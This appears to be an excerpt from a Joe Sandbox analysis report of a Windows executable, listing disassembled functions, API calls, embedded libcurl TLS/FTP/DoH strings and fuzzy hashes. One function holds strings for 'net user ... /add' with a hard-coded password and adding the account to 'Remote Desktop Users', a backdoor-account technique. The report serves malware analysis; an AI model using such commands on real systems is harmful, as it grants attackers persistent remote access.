GetLastError.KERNEL32 ref: 00007FF7F12F1913
CertFreeCertificateChainEngine.CRYPT32 ref: 00007FF7F12F1A32
CertCloseStore.CRYPT32 ref: 00007FF7F12F1A42
CertFreeCertificateChain.CRYPT32 ref: 00007FF7F12F1A52
CertFreeCertificateContext.CRYPT32 ref: 00007FF7F12F1A62

Strings

P, xrefs: 00007FF7F12F186A
(memory blob), xrefs: 00007FF7F12F17F2
schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN, xrefs: 00007FF7F12F19CE
schannel: failed to create certificate store: %s, xrefs: 00007FF7F12F17C6
schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN, xrefs: 00007FF7F12F198F
schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID, xrefs: 00007FF7F12F19BA
schannel: CertGetCertificateChain error mask: 0x%08lx, xrefs: 00007FF7F12F19DC
schannel: failed to create certificate chain user: %s, xrefs: 00007FF7F12F189A
schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT, xrefs: 00007FF7F12F19A6
schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED, xrefs: 00007FF7F12F1977
schannel: reusing certificate store from cache, xrefs: 00007FF7F12F1771
schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00007FF7F12F1745
schannel: Failed to read remote certificate context: %s, xrefs: 00007FF7F12F1A14
schannel: CertGetCertificateChain failed: %s, xrefs: 00007FF7F12F192D

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Cert$Certificate$ChainErrorLast$Free$userStore$CloseContextCreateOpen
String ID: (memory blob)$P$schannel: CertGetCertificateChain error mask: 0x%08lx$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: Failed to read remote certificate context: %s$schannel: failed to create certificate chain user: %s$schannel: failed to create certificate store: %s$schannel: reusing certificate store from cache$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
API String ID: 3686861598-1548139997
Opcode ID: 6840e7675d4172cfa020f05b2ed9982b8234b58fa473701a1b323c7aa86cb18e
Instruction ID: bd7c5bb0bed99a68639161ebd63b4d9799e3e38e1afaec047d31695e407cc040
Opcode Fuzzy Hash: 6840e7675d4172cfa020f05b2ed9982b8234b58fa473701a1b323c7aa86cb18e
Instruction Fuzzy Hash: CCB1A125B18B4282FB14ABA5D8402BDA3A1BF45B80FD04036DE7D87BD5DFACE505C7A0

Function 00007FF7F12C1FF0 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 205COMMON

Download Yara Rule

Strings

Authorization: Bearer %s, xrefs: 00007FF7F12C22AF
Proxy-, xrefs: 00007FF7F12C220C
Proxy-authorization, xrefs: 00007FF7F12C20F4
AWS_SIGV4, xrefs: 00007FF7F12C2042
%s auth using %s with user '%s', xrefs: 00007FF7F12C2305
Negotiate, xrefs: 00007FF7F12C2066
Proxy, xrefs: 00007FF7F12C2313
NTLM, xrefs: 00007FF7F12C208A
Digest, xrefs: 00007FF7F12C20B2
Bearer, xrefs: 00007FF7F12C229B
%s:%s, xrefs: 00007FF7F12C2191
Server, xrefs: 00007FF7F12C22FB
Basic, xrefs: 00007FF7F12C2172
%sAuthorization: Basic %s, xrefs: 00007FF7F12C2216
Authorization, xrefs: 00007FF7F12C2141, 00007FF7F12C2280

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
API String ID: 0-3819500859
Opcode ID: 53363949bcef1701e216299b3d3f820223c42d095194676b42ac336a333ea8ef
Instruction ID: 2d1f19fde79791169bc33cafa85a55b09bc2818880a5a82e6d5fdc552cf98a4c
Opcode Fuzzy Hash: 53363949bcef1701e216299b3d3f820223c42d095194676b42ac336a333ea8ef
Instruction Fuzzy Hash: 5591B221B08B8282EB64AB5594403B9A3A5BF447A0FC0413ADB6DC33E5DFBCE545D3A1

Function 00007FF7F132D95C Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 294COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132DD9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132DDA1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132DDA7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132DDAD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132DDB9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132DDBF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132DDC5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132DDCB

Strings

net localgroup "Remote Desktop Users" , xrefs: 00007FF7F132DBDA
eWMhydGcXFEz2CLrVL, xrefs: 00007FF7F132D9D9
/add, xrefs: 00007FF7F132DAA6
net user , xrefs: 00007FF7F132D9FF
/add, xrefs: 00007FF7F132DBF1
&, xrefs: 00007FF7F132DBD1

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: /add$ /add$&$eWMhydGcXFEz2CLrVL$net localgroup "Remote Desktop Users" $net user
API String ID: 3668304517-3051407725
Opcode ID: 320914906d27588d1ee88ee69ad92a7b6e5c6fd5ec7e9f230b262226f5fdf961
Instruction ID: 9b74b4d3b5ddb38c0e80c06ccb5815d3429564f8f1ab2ea9e43f87cd586da7de
Opcode Fuzzy Hash: 320914906d27588d1ee88ee69ad92a7b6e5c6fd5ec7e9f230b262226f5fdf961
Instruction Fuzzy Hash: 05D18263F18B8586EB00EB68D5400ADB761FF957E4F905329EABD12AD9DF78D080C790

Function 00007FF7F12ED430 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7F12ED476
GetProcAddress.KERNEL32 ref: 00007FF7F12ED486
VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED541
VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED553
VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED565
VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED577
VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED58C
RtlVerifyVersionInfo.NTDLL ref: 00007FF7F12ED5AF
VerifyVersionInfoW.KERNEL32 ref: 00007FF7F12ED5BA
VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED607
RtlVerifyVersionInfo.NTDLL ref: 00007FF7F12ED626
VerifyVersionInfoW.KERNEL32 ref: 00007FF7F12ED631

Strings

ntdll, xrefs: 00007FF7F12ED46F
RtlVerifyVersionInfo, xrefs: 00007FF7F12ED47F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion$AddressHandleModuleProc
String ID: RtlVerifyVersionInfo$ntdll
API String ID: 574519269-1699696460
Opcode ID: 6585a223e4124871821a3ddb8e7e0dbb218b74d36c238672f84001b212f097d1
Instruction ID: 053dad2f0f808b01a213199801dee10ac58246f6eddfa15e16e80c384bee391d
Opcode Fuzzy Hash: 6585a223e4124871821a3ddb8e7e0dbb218b74d36c238672f84001b212f097d1
Instruction Fuzzy Hash: 2951DE21B0C24687E760AB61B814BBAA3A0FF85754F845039DD6E877D4DFBDE4049BA0

Function 00007FF7F12CE2D0 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F12ED430: GetModuleHandleA.KERNEL32 ref: 00007FF7F12ED476
Part of subcall function 00007FF7F12ED430: GetProcAddress.KERNEL32 ref: 00007FF7F12ED486

GetModuleHandleA.KERNEL32 ref: 00007FF7F12CE36B
GetProcAddress.KERNEL32 ref: 00007FF7F12CE37B

Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED541
Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED553
Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED565
Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED577
Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED58C
Part of subcall function 00007FF7F12ED430: RtlVerifyVersionInfo.NTDLL ref: 00007FF7F12ED5AF
Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED607
Part of subcall function 00007FF7F12ED430: RtlVerifyVersionInfo.NTDLL ref: 00007FF7F12ED626

Part of subcall function 00007FF7F12C5330: GetLastError.KERNEL32 ref: 00007FF7F12C5359

Strings

schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 00007FF7F12CE706
schannel: unable to allocate memory, xrefs: 00007FF7F12CE5AA
schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 00007FF7F12CE34F
wine_get_version, xrefs: 00007FF7F12CE374
ALPN: curl offers %s, xrefs: 00007FF7F12CE52D
Error setting ALPN, xrefs: 00007FF7F12CE4AB
ntdll, xrefs: 00007FF7F12CE364
schannel: initial InitializeSecurityContext failed: %s, xrefs: 00007FF7F12CE65B, 00007FF7F12CE687
schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00007FF7F12CE71C
schannel: using IP address, SNI is not supported by OS., xrefs: 00007FF7F12CE476
schannel: SNI or certificate check failed: %s, xrefs: 00007FF7F12CE671

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersion$ErrorLast
String ID: ALPN: curl offers %s$Error setting ALPN$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
API String ID: 3979806620-3097429119
Opcode ID: 4bd5211e1340ab23906e2c3816960cabef9cbbde069c521b5fe155b7bb185073
Instruction ID: c12e882179b1f10129d0426cb02da94ce4496664283bc5b42e759f283a4b4b57
Opcode Fuzzy Hash: 4bd5211e1340ab23906e2c3816960cabef9cbbde069c521b5fe155b7bb185073
Instruction Fuzzy Hash: E3D1BD32B08B418AFB10ABA5E8402AEBBA4FB44798F800035DB5C977D5DFBCE555D790

Function 00007FF7F12F2150 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7F12F2369
GetLastError.KERNEL32 ref: 00007FF7F12F23AA

Part of subcall function 00007FF7F12C5BE0: GetLastError.KERNEL32 ref: 00007FF7F12C5C58
Part of subcall function 00007FF7F12C5BE0: SetLastError.KERNEL32 ref: 00007FF7F12C5C64

GetLastError.KERNEL32 ref: 00007FF7F12F2191

Part of subcall function 00007FF7F12C5BE0: GetLastError.KERNEL32 ref: 00007FF7F12C5C02

CreateFileA.KERNEL32 ref: 00007FF7F12F21FE
GetLastError.KERNEL32 ref: 00007FF7F12F220D

Strings

schannel: CA file exceeds max size of %u bytes, xrefs: 00007FF7F12F22AB
schannel: failed to read from CA file '%s': %s, xrefs: 00007FF7F12F23C5
schannel: failed to open CA file '%s': %s, xrefs: 00007FF7F12F2228
schannel: failed to determine size of CA file '%s': %s, xrefs: 00007FF7F12F2273
schannel: invalid path name for CA file '%s': %s, xrefs: 00007FF7F12F21AC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandle
String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
API String ID: 614986841-3430970913
Opcode ID: 9a6808bf741462c6f9bbb8724a313554047b0ce4f20a53530f59e21d1ec77466
Instruction ID: 8fbaefe17baf923bbe914d8105557b2d0c41ca389af97406fac50b4f19353ea1
Opcode Fuzzy Hash: 9a6808bf741462c6f9bbb8724a313554047b0ce4f20a53530f59e21d1ec77466
Instruction Fuzzy Hash: BA519365B0C74282E720AB91E4507AAA690FF4ABD4FC00139DE6E877C5DFFCE50497A0

Function 00007FF7F12C9F90 Relevance: 21.4, APIs: 1, Strings: 11, Instructions: 380COMMON

Download Yara Rule

Strings

DoH: %s type %s for %s, xrefs: 00007FF7F12CA13F
[DoH] AAAA: , xrefs: 00007FF7F12CA246
unknown, xrefs: 00007FF7F12CA106
%s%02x%02x, xrefs: 00007FF7F12CA29E
bad error code, xrefs: 00007FF7F12CA131
Could not DoH-resolve: %s, xrefs: 00007FF7F12C9FFB
[DoH] TTL: %u seconds, xrefs: 00007FF7F12CA1DD
AAAA, xrefs: 00007FF7F12CA10F
[DoH] hostname: %s, xrefs: 00007FF7F12CA1C0
[DoH] A: %u.%u.%u.%u, xrefs: 00007FF7F12CA213
CNAME: %s, xrefs: 00007FF7F12CA357

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: %s%02x%02x$AAAA$CNAME: %s$Could not DoH-resolve: %s$DoH: %s type %s for %s$[DoH] A: %u.%u.%u.%u$[DoH] AAAA: $[DoH] TTL: %u seconds$[DoH] hostname: %s$bad error code$unknown
API String ID: 0-228328110
Opcode ID: 13cd3be1005c86a1ec27c892ed69e42b461a9b1031d02d779e985be2e9e3c37b
Instruction ID: f0d17dd46dd9fe6eef72c1938fd8a2e1aed8e903b2f6c650d8b0a9b76bd5b024
Opcode Fuzzy Hash: 13cd3be1005c86a1ec27c892ed69e42b461a9b1031d02d779e985be2e9e3c37b
Instruction Fuzzy Hash: EF02B272B0868286EB20AF54F4443AAB7A0FB447A4F844136DB6D877D5EFBCD541C7A0

Function 00007FF7F12C5330 Relevance: 21.1, APIs: 3, Strings: 11, Instructions: 118COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5359

Strings

CRYPT_E_REVOKED, xrefs: 00007FF7F12C571F
CRYPT_E_NO_REVOCATION_CHECK, xrefs: 00007FF7F12C5781
No error, xrefs: 00007FF7F12C575D
CRYPT_E_NO_REVOCATION_DLL, xrefs: 00007FF7F12C578D
SEC_I_CONTINUE_NEEDED, xrefs: 00007FF7F12C5799
%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC
CRYPT_E_NOT_IN_REVOCATION_DATABASE, xrefs: 00007FF7F12C5769
CRYPT_E_REVOCATION_OFFLINE, xrefs: 00007FF7F12C5775
Unknown error, xrefs: 00007FF7F12C582D
SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 00007FF7F12C5846
%s (0x%08X), xrefs: 00007FF7F12C585A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X)$%s (0x%08X) - %s$CRYPT_E_NOT_IN_REVOCATION_DATABASE$CRYPT_E_NO_REVOCATION_CHECK$CRYPT_E_NO_REVOCATION_DLL$CRYPT_E_REVOCATION_OFFLINE$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
API String ID: 1452528299-2168394622
Opcode ID: 889728edff7eba4f92558a5f8e6b9288cf06ad9ecd984fd5a7622ac47b6d3bf3
Instruction ID: b2d5217cefcb15707e84294b4b11752fc60812c05c61b6e2e36c1f5d548e18bd
Opcode Fuzzy Hash: 889728edff7eba4f92558a5f8e6b9288cf06ad9ecd984fd5a7622ac47b6d3bf3
Instruction Fuzzy Hash: 0E518061B0C94286F724BB85A8401B9E3A1AF447A0FC84135DA6D836D1DFFCF585EBB1

Function 00007FF7F12CE760 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 367encryptionCOMMON

Download Yara Rule

APIs

CertFreeCertificateContext.CRYPT32 ref: 00007FF7F12CEC6E

Part of subcall function 00007FF7F12C5330: GetLastError.KERNEL32 ref: 00007FF7F12C5359

Part of subcall function 00007FF7F12F1AA0: CertGetNameStringA.CRYPT32 ref: 00007FF7F12F1B8F
Part of subcall function 00007FF7F12F1AA0: CertFreeCertificateContext.CRYPT32 ref: 00007FF7F12F1E46

Strings

schannel: unable to allocate memory, xrefs: 00007FF7F12CED91
schannel: next InitializeSecurityContext failed: %s, xrefs: 00007FF7F12CED13, 00007FF7F12CED55
schannel: unable to re-allocate memory, xrefs: 00007FF7F12CE866
schannel: failed to send next handshake data: sent %zd of %lu bytes, xrefs: 00007FF7F12CEAFE
schannel: %s, xrefs: 00007FF7F12CED29
schannel: failed to receive handshake, SSL/TLS connection failed, xrefs: 00007FF7F12CEAE2
SSL: public key does not match pinned public key, xrefs: 00007FF7F12CEC1C, 00007FF7F12CEC7C
schannel: Failed to read remote certificate context: %s, xrefs: 00007FF7F12CEC55
schannel: SNI or certificate check failed: %s, xrefs: 00007FF7F12CED3F
SSL: failed retrieving public key from server certificate, xrefs: 00007FF7F12CEC2D

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Cert$CertificateContextFree$ErrorLastNameString
String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
API String ID: 1131146079-413892695
Opcode ID: ca56fa4d74fab9b576665a9abeea60942184a8ff2ebc3d820be9115e7dab8923
Instruction ID: 5815881085ce8cab3be93f5d95ee972fefe4e95fa4511e31f5171216e76d6dc8
Opcode Fuzzy Hash: ca56fa4d74fab9b576665a9abeea60942184a8ff2ebc3d820be9115e7dab8923
Instruction Fuzzy Hash: 4B029072B087828AEB60AF55D4443AABBA0FB44794F804039DB6E977D4DFBCE544D390

Function 00007FF7F12DC500 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 196networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF7F12DC7BA

Strings

STOP, xrefs: 00007FF7F12DC723
QUOT string not accepted: %s, xrefs: 00007FF7F12DC7E0
FTP response aborted due to select/poll error: %d, xrefs: 00007FF7F12DC7C0
We got a 421 - timeout, xrefs: 00007FF7F12DC6EC
[%s] -> [%s], xrefs: 00007FF7F12DC72D
getFTPResponse -> result=%d, nread=%zd, ftpcode=%d, xrefs: 00007FF7F12DC754
FTP response timeout, xrefs: 00007FF7F12DC7F6
getFTPResponse start, xrefs: 00007FF7F12DC585
???, xrefs: 00007FF7F12DC50D, 00007FF7F12DC71C
*, xrefs: 00007FF7F12DC76B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: *$???$FTP response aborted due to select/poll error: %d$FTP response timeout$QUOT string not accepted: %s$STOP$We got a 421 - timeout$[%s] -> [%s]$getFTPResponse -> result=%d, nread=%zd, ftpcode=%d$getFTPResponse start
API String ID: 1452528299-1133872225
Opcode ID: ada53dd4ba11d9d5ad2f7ac4f63658b13353771e02e34838f9283531d5a767ea
Instruction ID: a3897b7f0178f359f488e64faebdbad4aeb17f3e3fa0b7af3e27e6017b3b866d
Opcode Fuzzy Hash: ada53dd4ba11d9d5ad2f7ac4f63658b13353771e02e34838f9283531d5a767ea
Instruction Fuzzy Hash: E5810622B0C78245FB54AB59E8002B9B355AF857A0FD41139DE6E833D5EFBCE45283E0

Function 00007FF7F12F05B0 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 433COMMON

Download Yara Rule

Strings

X-%s-Date, xrefs: 00007FF7F12F0641
Date, xrefs: 00007FF7F12F0992
%s: %s, xrefs: 00007FF7F12F09CA
host:%s, xrefs: 00007FF7F12F0744
Host, xrefs: 00007FF7F12F068F
x-%s-date:%s, xrefs: 00007FF7F12F0670

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: %s: %s$Date$Host$X-%s-Date$host:%s$x-%s-date:%s
API String ID: 0-2873700390
Opcode ID: 061267563c2cbf6c89a14920a58fef8e25cd05ecdb8686989081c5a19bff024a
Instruction ID: ff753298a6f4638987ce7af31e3fa1b574b3df874e2a231c480d2eaad1d0e21e
Opcode Fuzzy Hash: 061267563c2cbf6c89a14920a58fef8e25cd05ecdb8686989081c5a19bff024a
Instruction Fuzzy Hash: FBF13521B0D68645FB21ABA194503B9E792AF45B94FC84131CEBD873C1EFBEE445C3A4

Function 00007FF7F12D34D0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210networkCOMMON

Download Yara Rule

APIs

sendto.WS2_32 ref: 00007FF7F12D3649
sendto.WS2_32 ref: 00007FF7F12D370C
WSAGetLastError.WS2_32 ref: 00007FF7F12D3716

Strings

Received ACK for block %d, expecting %d, xrefs: 00007FF7F12D369E
tftp_tx: internal error, event: %i, xrefs: 00007FF7F12D3522
tftp_tx: giving up waiting for block %d ack, xrefs: 00007FF7F12D36C2
Timeout waiting for block %d ACK. Retries = %d, xrefs: 00007FF7F12D3537

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

